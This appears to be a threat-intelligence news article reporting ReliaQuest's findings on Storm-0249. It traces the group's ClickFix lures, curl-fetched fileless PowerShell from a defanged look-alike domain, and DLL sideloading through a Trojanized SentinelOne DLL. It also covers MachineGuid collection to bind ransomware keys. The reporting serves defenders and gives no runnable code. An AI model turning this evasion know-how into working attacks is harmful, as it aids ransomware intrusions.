The group identified as Storm-0249 appears to be transitioning from acting as an initial access broker to utilizing more sophisticated techniques such as domain spoofing, DLL side-loading, and fileless PowerShell execution to carry out ransomware attacks.
These advanced methods enable the threat actor to evade security measures, infiltrate networks, maintain a presence, and operate without detection, posing significant challenges to cybersecurity teams, according to a report by ReliaQuest shared with The Hacker News.
Referred to as Storm-0249 by Microsoft, this initial access broker has been selling entry points into organizations to various cybercrime groups, including ransomware and extortion actors like Storm-0501, since it was first brought to attention in September 2024.
Earlier this year, Microsoft disclosed details of a phishing campaign orchestrated by Storm-0249, using tax-related themes to target U.S. users prior to the tax season, infecting them with Latrodectus and the BruteRatel C4 (BRc4) post-exploitation framework.
The ultimate objective of these attacks is to establish persistent access to enterprise networks and sell them to ransomware groups, streamlining the process of targeting and executing ransomware attacks.
Recent revelations from ReliaQuest indicate a shift in tactics, as Storm-0249 now employs the ClickFix social engineering technique to deceive potential victims into running malicious commands through the Windows Run dialog, under the guise of resolving technical issues.
By executing a command that utilizes the legitimate “curl.exe” to fetch a PowerShell script from a URL mimicking a Microsoft domain (“sgcipl[.]com/us.microsoft.com/bdo/”), perpetrators aim to trick victims and execute the script in a fileless manner via PowerShell.
This leads to the deployment of a malicious MSI package with SYSTEM privileges, dropping a Trojanized DLL linked to SentinelOne’s endpoint security solution (“SentinelAgentCore.dll”) into the user’s AppData folder alongside the legitimate “SentinelAgentWorker.exe” executable.
The rogue DLL is then sideloaded when the “SentinelAgentWorker.exe” process is initiated, enabling covert operations. The DLL establishes encrypted communication with a command-and-control (C2) server.
Storm-0249 has also been utilizing legitimate Windows administrative utilities such as reg.exe and findstr.exe to extract unique system identifiers like MachineGuid, laying the groundwork for subsequent ransomware attacks. By leveraging living-off-the-land (LotL) tactics and executing commands under the trusted “SentinelAgentWorker.exe” process, the malicious activity remains undetected.
These findings suggest a departure from widespread phishing campaigns to targeted attacks that exploit the trust associated with signed processes to enhance stealth.
According to ReliaQuest, this strategic shift indicates preparation for ransomware affiliates, citing groups like LockBit and ALPHV that utilize MachineGuid to bind encryption keys to individual victim systems.
By associating encryption keys with MachineGuid, attackers ensure that even if the ransomware binary is intercepted or encryption algorithms are reverse-engineered, files cannot be decrypted without the attacker-controlled key.
![Apple pushing back on 'vibe coding' iPhone apps, developers say [U]](https://bennetttechinnovation.com/wp-content/uploads/2026/03/Apple-Stands-Firm-Against-Vibe-Coding-iPhone-Apps-Defying-Developers-80x80.jpg)
